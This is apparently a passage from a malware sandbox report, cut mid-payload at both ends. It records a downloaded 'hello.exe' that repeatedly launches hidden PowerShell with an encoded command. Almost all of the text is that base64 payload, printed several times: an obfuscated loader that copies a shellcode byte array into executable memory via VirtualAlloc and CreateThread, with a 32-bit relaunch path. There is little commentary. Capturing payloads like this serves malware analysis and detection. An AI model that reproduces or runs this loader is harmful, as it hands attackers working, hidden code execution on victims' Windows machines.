GIANwAsADAAeABjADEALAAwAHgAYQA0ACwAMAB4ADkANQAsADAAeABhADcALAAwAHgAMwA1ACwAMAB4ADkAMQAsADAAeAA5ADkALAAwAHgANQAyACwAMAB4ADAANwAsADAAeAA3ADIALAAwAHgAZAA2ACwAMAB4ADIAOQAsADAAeAAzADUALAAwAHgAZAA1ACwAMAB4AGUAOQAsADAAeAA4ADQALAAwAHgANQAwACwAMAB4ADkAYQAsADAAeAA3AGQALAAwAHgAMgA2ACwAMAB4AGIANQAsADAAeAAxAGEALAAwAHgANwBlACwAMAB4ADQAZQAsADAAeABiADUALAAwAHgAMQBhACwAMAB4ADMAZQAsADAAeAA4AGUALAAwAHgAZQA2ACwAMAB4ADcAMgAsADAAeABlADYALAAwAHgAMgBhACwAMAB4ADUAYgAsADAAeAA2ADYALAAwAHgAZQA5ACwAMAB4AGUANwAsADAAeABjAGYALAAwAHgAMwBiACwAMAB4ADQANQAsADAAeAA4AGUALAAwAHgAMQA3ACwAMAB4AGUAYwAsADAAeAAwADEALAAwAHgAOQAwACwAMAB4AGYANwAsADAAeAAxADMALAAwAHgAZAAyACwAMAB4AGMAMwAsADAAeABhADEALAAwAHgANwBiACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAYwA0ACwAMAB4ADkAZQAsADAAeAAxAGIALAAwAHgAYQBjACwAMAB4ADUAMgAsADAAeAA5AGUALAAwAHgAOQAwACwAMAB4ADgAMwAsADAAeABkADYALAAwAHgAMQA4ACwAMAB4ADUAOAAsADAAeABkADgALAAwAHgANgBjACwAMAB4AGUANgAsADAAeAAyAGYALAAwAHgAMwBiACwAMAB4ADMANgAsADAAeAAyADQALAAwAHgAOQAwACwAMAB4ADIAYgAsADAAeABhAGUALAAwAHgANQA1ACwAMAB4AGQAMAAsADAAeAA1ADQALAAwAHgAMAAwACwAMAB4ADkAMwAsADAAeAAxAGQALAAwAHgAOAA0ACwAMAB4ADUAMgAsADAAeABkADUALAAwAHgANQA5ACwAMAB4AGYANgAsADAAeABhAGMALAAwAHgAMgAxACwAMAB4AGIANAAsADAAeAAzADcALAAwAHgAZgBmACwAMAB4ADYAOQAsADAAeABjADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEoAYQBYAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABKAGEAWAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASgBhAFgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHoAbQApACkAOwAkAG4AeAA3AFYAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABHADYAQwBWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAEcANgBDAFYAIAAkAG4AeAA3AFYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAbgB4ADcAVgAgACQAZQAiADsAfQA=
  2⤵
  PID:368

C:\Users\Admin\Downloads\hello.exe
"C:\Users\Admin\Downloads\hello.exe"
1⤵
- Executes dropped EXE
PID:5096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB0AHoAbQAgAD0AIAAnACQAWABOAEgAYQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABYAE4ASABhACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAYgBlACwAMAB4ADIAOQAsADAAeABmAGMALAAwAHgAZAA0ACwAMAB4ADcANAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeABlADIALAAwAHgAZABjACwAMAB4ADAAMAAsADAAeAAzAGMALAAwAHgAZgBiACwAMAB4ADEAZQAsADAAeABmADkALAAwAHgAYgBkACwAMAB4ADYANAAsADAAeAAyAGYALAAwAHgAMgBiACwAMAB4ADMANAAsADAAeAA4ADEALAAwAHgAMgBiACwAMAB4ADQAMAAsADAAeAAxADUALAAwAHgANwBhACwAMAB4ADMAOAAsADAAeAAwADQALAAwAHgAOQA2ACwAMAB4AGYAMQAsADAAeAA2AGMALAAwAHgAYgBkACwAMAB4AGEAOQAsADAAeABiADIALAAwAHgAZABhACwAMAB4ADkAYgAsADAAeAA4ADQALAAwAHgANAAzACwAMAB4ADUAMQAsADAAeAA5ADEALAAwAHgAYwBlACwAMAB4ADgAYQAsADAAeABhADUALAAwAHgAZgBhACwAMAB4ADMAMwAsADAAeAA4AGMALAAwAHgANQA5ACwAMAB4ADAAMQAsADAAeAA2ADAALAAwAHgANgBlACwAMAB4ADYAMAAsADAAeABjAGEALAAwAHgANwA1ACwAMAB4ADYAZgAsADAAeABhADUALAAwAHgAOQBjACwAMAB4AGYAMAAsADAAeAA4ADAALAAwAHgANwBiACwAMAB4ADkANAAsADAAeABhADkALAAwAHgANABlACwAMAB4ADIAYwAsADAAeAAyADEALAAwAHgAMABmACwAMAB4ADUAMwAsADAAeABkADMALAAwAHgAZQA1ACwAMAB4ADEAYgAsADAAeABlAGIALAAwAHgAYQBiACwAMAB4ADgAMAAsADAAeABkAGMALAAwAHgAOQA4ACwAMAB4ADAANwAsADAAeAA4AGEALAAwAHgAMABjACwAMAB4AGUAYgAsADAAeABkAGYALAAwAHgAOQA0ACwAMAB4AGYAYwAsADAAeAA2ADcALAAwAHgAOAA3ACwAMAB4ADgANAAsADAAeABmAGQALAAwAHgAYQA0ACwAMAB4AGIAMgAsADAAeAAwAGMALAAwAHgAOAA5ACwAMAB4ADcANgAsADAAeABmADUALAAwAHgAMAA1ACwAMAB4ADQANgAsADAAeAAwAGMALAAwAHgAMwA0ACwAMAB4AGUANQAsADAAeABhADYALAAwAHgAYwA0ACwAMAB4ADAANwAsADAAeABkADkALAAwAHgANgA4ACwAMAB4ADIANwAsADAAeAA2AGEALAAwAHgANwA1ACwAMAB4ADYAYgAsADAAeAA3AGYALAAwAHgANABjACwAMAB4ADYANQAsADAAeAAxADkALAAwAHgAOABiACwAMAB4AGEAZgAsADAAeAAxADgALAAwAHgAMQBhACwAMAB4ADQAOAAsADAAeABkADIALAAwAHgAYwA2ACwAMAB4AGEAZgAsADAAeAA0AGYALAAwAHgANwA0ACwAMAB4ADgAYwAsADAAeAAwADgALAAwAHgAYgA0ACwAMAB4ADgANQAsADAAeAA0ADEALAAwAHgAYwBlACwAMAB4ADMAZgAsADAAeAA4ADkALAAwAHgAMgBlACwAMAB4ADgANAAsADAAeAAxADgALAAwAHgAOABkACwAMAB4AGIAMQAsADAAeAA0ADkALAAwAHgAMQAzACwAMAB4AGEAOQAsADAAeAAzAGEALAAwAHgANgBjACwAMAB4AGYANAAsADAAeAAzADgALAAwAHgANwA4ACwAMAB4ADQAYgAsADAAeABkADAALAAwAHgANgAxACwAMAB4AGQAYQAsADAAeABmADIALAAwAHgANAAxACwAMAB4AGMAZgAsADAAeAA4AGQALAAwAHgAMABiACwAMAB4ADkAMQAsADAAeABiADcALAAwAHgANwAyACwAMAB4AGEAZQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4ADYANAAsADAAeABjAGUALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeAA4ADkALAAwAHgAOQAyACwAMAB4AGIANQAsADAAeAAzADYALAAwAHgAMQAzACwAMAB4ADUAOQAsADAAeAA0ADYALAAwAHgAYQBlACwAMAB4AGEAYwAsADAAeABjADgALAAwAHgAMgA4ACwAMAB4ADQANwAsADAAeAAwADcALAAwAHgANgAzACwAMAB4AGYAOQAsADAAeABlADAALAAwAHgAOAAxACwAMAB4ADcANAAsADAAeABmAGUALAAwAHgAZABiACwAMAB4AGYAZgAsADAAeABhADEALAAwAHgANQAzACwAMAB4AGIAMAAsADAAeABhAGMALAAwAHgAMAA2ACwAMAB4ADAANwAsADAAeAA1AGUALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABkAGUALAAwAHgAMwA5ACwAMAB4ADcAMgAsADAAeAAyAGEALAAwAHgANwAzACwAMAB4ADEANgAsADAAeABlADcALAAwAHgAZAA2ACwAMAB4ADIANwAsADAAeABjAGIALAAwAHgAOQBmACwAMAB4ADcANgAsADAAeABjAGYALAAwAHgAZQBiACwAMAB4ADUAZgAsADAAeAA2AGYALAAwAHgANgAwACwAMAB4AGUAYgAsADAAeAA1AGYALAAwAHgANgBmACwAMAB4AGEAZQAsADAAeABhAGUALAAwAHgAMwBhACwAMAB4ADIAOQAsADAAeABkAGMALAAwAHgAMQBkACwAMAB4AGIAMgAsADAAeAA4ADEALAAwAHgAMgBjACwAMAB4ADAANQAsADAAeAA1ADAALAAwAHgAYgBkACwAMAB4ADcANAAsADAAeABlAGQALAAwAHgAZQA0ACwAMAB4ADcAMAAsADAAeABlADEALAAwAHgAMwBmACwAMAB4ADkAOAAsADAAeAAwADgALAAwAHgAYgBhACwAMAB4ADYAZAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUAZAAsADAAeABhADUALAAwAHgAZQBmACwAMAB4ADMAYgAsADAAeABjADQALAAwAHgAYQAxACwAMAB4AGUAZgAsADAAeABlAGIALAAwAHgAOQAwACwAMAB4ADcAZQAsADAAeAA3ADkALAAwAHgAOQA0ACwAMAB4AGEANwAsADAAeAA3AGYALAAwAHgAYQBjACwAMAB4ADIAMgAsADAAeABlADEALAAwAHgAMgBjACwAMAB4ADIANwAsADAAeAAzADUALAAwAHgAZABjACwAMAB4ADMAYQAsADAAeAAzADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeABlADkALAAwAHgANgBiACwAMAB4AGQAYQAsADAAeAAyADUALAAwAHgANgA1ACwAMAB4ADcAZgAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADQAZQAsADAAeAA4ADAALAAwAHgAZQA3ACwAMAB4ADYAZQAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4ADUANwAsADAAeABlADcALAAwAHgAOQBhACwAMAB4AGIAYQAsADAAeAA2ADcALAAwAHgAZgA3ACwAMAB4ADEAMwAsADAAeAA1AGMALAAwAHgAMABkACwAMAB4AGYAMwAsADAAeAA3ADMALAAwAHgAZgA3ACwAMAB4AGMAZAAsADAAeABhAGQALAAwAHgAMQBiACwAMAB4ADcAMgAsADAAeABiADQALAAwAHgAYwBmACwAMAB4ADUAZAAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGEAMwAsADAAeAAzADIALAAwAHgAMgBmACwAMAB4ADUAZAAsADAAeAAxADIALAAwAHgAZABjACwAMAB4AGUAMgAsADAAeAA2ADcALAAwAHgAOAAyACwAMAB4ADYANwAsADAAeAAwADIALAAwAHgAYgAyACwAMAB4ADMANwAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADIAYgAsADAAeAA1ADAALAAwAHgAZABmACwAMAB4ADYAMQAsADAAeAA1ADQALAAwAHgAYQAwACwAMAB4AGIANwAsADAAeABjADEALAAwAHgAYQA0ACwAMAB4ADkANQAsADAAeABhADcALAAwAHgAMwA1ACwAMAB4ADkAMQAsADAAeAA5ADkALAAwAHgANQAyACwAMAB4ADAANwAsADAAeAA3ADIALAAwAHgAZAA2ACwAMAB4ADIAOQAsADAAeAAzADUALAAwAHgAZAA1ACwAMAB4AGUAOQAsADAAeAA4ADQALAAwAHgANQAwACwAMAB4ADkAYQAsADAAeAA3AGQALAAwAHgAMgA2ACwAMAB4AGIANQAsADAAeAAxAGEALAAwAHgANwBlACwAMAB4ADQAZQAsADAAeABiADUALAAwAHgAMQBhACwAMAB4ADMAZQAsADAAeAA4AGUALAAwAHgAZQA2ACwAMAB4ADcAMgAsADAAeABlADYALAAwAHgAMgBhACwAMAB4ADUAYgAsADAAeAA2ADYALAAwAHgAZQA5ACwAMAB4AGUANwAsADAAeABjAGYALAAwAHgAMwBiACwAMAB4ADQANQAsADAAeAA4AGUALAAwAHgAMQA3ACwAMAB4AGUAYwAsADAAeAAwADEALAAwAHgAOQAwACwAMAB4AGYANwAsADAAeAAxADMALAAwAHgAZAAyACwAMAB4AGMAMwAsADAAeABhADEALAAwAHgANwBiACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAYwA0ACwAMAB4ADkAZQAsADAAeAAxAGIALAAwAHgAYQBjACwAMAB4ADUAMgAsADAAeAA5AGUALAAwAHgAOQAwACwAMAB4ADgAMwAsADAAeABkADYALAAwAHgAMQA4ACwAMAB4ADUAOAAsADAAeABkADgALAAwAHgANgBjACwAMAB4AGUANgAsADAAeAAyAGYALAAwAHgAMwBiACwAMAB4ADMANgAsADAAeAAyADQALAAwAHgAOQAwACwAMAB4ADIAYgAsADAAeABhAGUALAAwAHgANQA1ACwAMAB4AGQAMAAsADAAeAA1ADQALAAwAHgAMAAwACwAMAB4ADkAMwAsADAAeAAxAGQALAAwAHgAOAA0ACwAMAB4ADUAMgAsADAAeABkADUALAAwAHgANQA5ACwAMAB4AGYANgAsADAAeABhAGMALAAwAHgAMgAxACwAMAB4AGIANAAsADAAeAAzADcALAAwAHgAZgBmACwAMAB4ADYAOQAsADAAeABjADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEoAYQBYAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABKAGEAWAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASgBhAFgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHoAbQApACkAOwAkAG4AeAA3AFYAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABHADYAQwBWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAEcANgBDAFYAIAAkAG4AeAA3AFYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAbgB4ADcAVgAgACQAZQAiADsAfQA=
  2⤵
  PID:4132

C:\Users\Admin\Downloads\hello.exe
"C:\Users\Admin\Downloads\hello.exe"
1⤵
- Executes dropped EXE
PID:4212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB0AHoAbQAgAD0AIAAnACQAWABOAEgAYQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABYAE4ASABhACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAYgBlACwAMAB4ADIAOQAsADAAeABmAGMALAAwAHgAZAA0ACwAMAB4ADcANAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeABlADIALAAwAHgAZABjACwAMAB4ADAAMAAsADAAeAAzAGMALAAwAHgAZgBiACwAMAB4ADEAZQAsADAAeABmADkALAAwAHgAYgBkACwAMAB4ADYANAAsADAAeAAyAGYALAAwAHgAMgBiACwAMAB4ADMANAAsADAAeAA4ADEALAAwAHgAMgBiACwAMAB4ADQAMAAsADAAeAAxADUALAAwAHgANwBhACwAMAB4ADMAOAAsADAAeAAwADQALAAwAHgAOQA2ACwAMAB4AGYAMQAsADAAeAA2AGMALAAwAHgAYgBkACwAMAB4AGEAOQAsADAAeABiADIALAAwAHgAZABhACwAMAB4ADkAYgAsADAAeAA4ADQALAAwAHgANAAzACwAMAB4ADUAMQAsADAAeAA5ADEALAAwAHgAYwBlACwAMAB4ADgAYQAsADAAeABhADUALAAwAHgAZgBhACwAMAB4ADMAMwAsADAAeAA4AGMALAAwAHgANQA5ACwAMAB4ADAAMQAsADAAeAA2ADAALAAwAHgANgBlACwAMAB4ADYAMAAsADAAeABjAGEALAAwAHgANwA1ACwAMAB4ADYAZgAsADAAeABhADUALAAwAHgAOQBjACwAMAB4AGYAMAAsADAAeAA4ADAALAAwAHgANwBiACwAMAB4ADkANAAsADAAeABhADkALAAwAHgANABlACwAMAB4ADIAYwAsADAAeAAyADEALAAwAHgAMABmACwAMAB4ADUAMwAsADAAeABkADMALAAwAHgAZQA1ACwAMAB4ADEAYgAsADAAeABlAGIALAAwAHgAYQBiACwAMAB4ADgAMAAsADAAeABkAGMALAAwAHgAOQA4ACwAMAB4ADAANwAsADAAeAA4AGEALAAwAHgAMABjACwAMAB4AGUAYgAsADAAeABkAGYALAAwAHgAOQA0ACwAMAB4AGYAYwAsADAAeAA2ADcALAAwAHgAOAA3ACwAMAB4ADgANAAsADAAeABmAGQALAAwAHgAYQA0ACwAMAB4AGIAMgAsADAAeAAwAGMALAAwAHgAOAA5ACwAMAB4ADcANgAsADAAeABmADUALAAwAHgAMAA1ACwAMAB4ADQANgAsADAAeAAwAGMALAAwAHgAMwA0ACwAMAB4AGUANQAsADAAeABhADYALAAwAHgAYwA0ACwAMAB4ADAANwAsADAAeABkADkALAAwAHgANgA4ACwAMAB4ADIANwAsADAAeAA2AGEALAAwAHgANwA1ACwAMAB4ADYAYgAsADAAeAA3AGYALAAwAHgANABjACwAMAB4ADYANQAsADAAeAAxADkALAAwAHgAOABiACwAMAB4AGEAZgAsADAAeAAxADgALAAwAHgAMQBhACwAMAB4ADQAOAAsADAAeABkADIALAAwAHgAYwA2ACwAMAB4AGEAZgAsADAAeAA0AGYALAAwAHgANwA0ACwAMAB4ADgAYwAsADAAeAAwADgALAAwAHgAYgA0ACwAMAB4ADgANQAsADAAeAA0ADEALAAwAHgAYwBlACwAMAB4ADMAZgAsADAAeAA4ADkALAAwAHgAMgBlACwAMAB4ADgANAAsADAAeAAxADgALAAwAHgAOABkACwAMAB4AGIAMQAsADAAeAA0ADkALAAwAHgAMQAzACwAMAB4AGEAOQAsADAAeAAzAGEALAAwAHgANgBjACwAMAB4AGYANAAsADAAeAAzADgALAAwAHgANwA4ACwAMAB4ADQAYgAsADAAeABkADAALAAwAHgANgAxACwAMAB4AGQAYQAsADAAeABmADIALAAwAHgANAAxACwAMAB4AGMAZgAsADAAeAA4AGQALAAwAHgAMABiACwAMAB4ADkAMQAsADAAeABiADcALAAwAHgANwAyACwAMAB4AGEAZQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4ADYANAAsADAAeABjAGUALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeAA4ADkALAAwAHgAOQAyACwAMAB4AGIANQAsADAAeAAzADYALAAwAHgAMQAzACwAMAB4ADUAOQAsADAAeAA0ADYALAAwAHgAYQBlACwAMAB4AGEAYwAsADAAeABjADgALAAwAHgAMgA4ACwAMAB4ADQANwAsADAAeAAwADcALAAwAHgANgAzACwAMAB4AGYAOQAsADAAeABlADAALAAwAHgAOAAxACwAMAB4ADcANAAsADAAeABmAGUALAAwAHgAZABiACwAMAB4AGYAZgAsADAAeABhADEALAAwAHgANQAzACwAMAB4AGIAMAAsADAAeABhAGMALAAwAHgAMAA2ACwAMAB4ADAANwAsADAAeAA1AGUALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABkAGUALAAwAHgAMwA5ACwAMAB4ADcAMgAsADAAeAAyAGEALAAwAHgANwAzACwAMAB4ADEANgAsADAAeABlADcALAAwAHgAZAA2ACwAMAB4ADIANwAsADAAeABjAGIALAAwAHgAOQBmACwAMAB4ADcANgAsADAAeABjAGYALAAwAHgAZQBiACwAMAB4ADUAZgAsADAAeAA2AGYALAAwAHgANgAwACwAMAB4AGUAYgAsADAAeAA1AGYALAAwAHgANgBmACwAMAB4AGEAZQAsADAAeABhAGUALAAwAHgAMwBhACwAMAB4ADIAOQAsADAAeABkAGMALAAwAHgAMQBkACwAMAB4AGIAMgAsADAAeAA4ADEALAAwAHgAMgBjACwAMAB4ADAANQAsADAAeAA1ADAALAAwAHgAYgBkACwAMAB4ADcANAAsADAAeABlAGQALAAwAHgAZQA0ACwAMAB4ADcAMAAsADAAeABlADEALAAwAHgAMwBmACwAMAB4ADkAOAAsADAAeAAwADgALAAwAHgAYgBhACwAMAB4ADYAZAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUAZAAsADAAeABhADUALAAwAHgAZQBmACwAMAB4ADMAYgAsADAAeABjADQALAAwAHgAYQAxACwAMAB4AGUAZgAsADAAeABlAGIALAAwAHgAOQAwACwAMAB4ADcAZQAsADAAeAA3ADkALAAwAHgAOQA0ACwAMAB4AGEANwAsADAAeAA3AGYALAAwAHgAYQBjACwAMAB4ADIAMgAsADAAeABlADEALAAwAHgAMgBjACwAMAB4ADIANwAsADAAeAAzADUALAAwAHgAZABjACwAMAB4ADMAYQAsADAAeAAzADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeABlADkALAAwAHgANgBiACwAMAB4AGQAYQAsADAAeAAyADUALAAwAHgANgA1ACwAMAB4ADcAZgA